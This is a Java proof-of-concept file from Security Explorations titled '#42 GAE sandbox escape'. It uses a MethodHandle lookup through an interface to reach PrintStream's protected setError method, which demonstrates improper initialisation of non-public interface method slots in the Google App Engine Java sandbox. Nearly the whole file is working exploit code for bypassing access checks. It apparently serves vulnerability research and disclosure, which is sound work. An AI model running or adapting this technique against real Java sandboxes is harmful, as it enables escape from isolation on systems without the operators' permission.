/*## (c) SECURITY EXPLORATIONS    2015 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

/* #42 GAE sandbox escape                                                     */
/* [improper initialization of non-public interface method slots]             */

import java.lang.*;
import java.lang.reflect.*;
import java.lang.invoke.*;
import java.io.*;
import java.net.*;
import java.security.*;

public class Test {

 public interface MyINTF {
  public void xxxError();
 }

 public static class MyPrintStream extends PrintStream implements MyINTF {
  MethodHandle setError_mh;

  public MyPrintStream(OutputStream os) {
   super(os);

   try {
    MethodHandles.Lookup l=MethodHandles.lookup();
    MethodType desc=MethodType.methodType(Void.TYPE,new Class[0]);

    setError_mh=l.findVirtual(MyINTF.class,"setError",desc);

    System.out.println(setError_mh);
   } catch(Throwable t) {t.printStackTrace();}
  }

  public void xxxError() {
  }

  public void invoke_interface() {
   try {
    setError_mh=setError_mh.bindTo(this);
    System.out.println(setError_mh);
    
    setError_mh.invoke();
   } catch(Throwable t) {t.printStackTrace();}
  }
 }

 public static void main(String args[]) {
  try {
   MyPrintStream mps=new MyPrintStream(new ByteArrayOutputStream());
   System.out.println(mps);

   System.out.println("checkError(): "+mps.checkError());
   mps.invoke_interface();
   System.out.println("checkError(): "+mps.checkError());
  } catch(Throwable t) {t.printStackTrace();}
 }
}
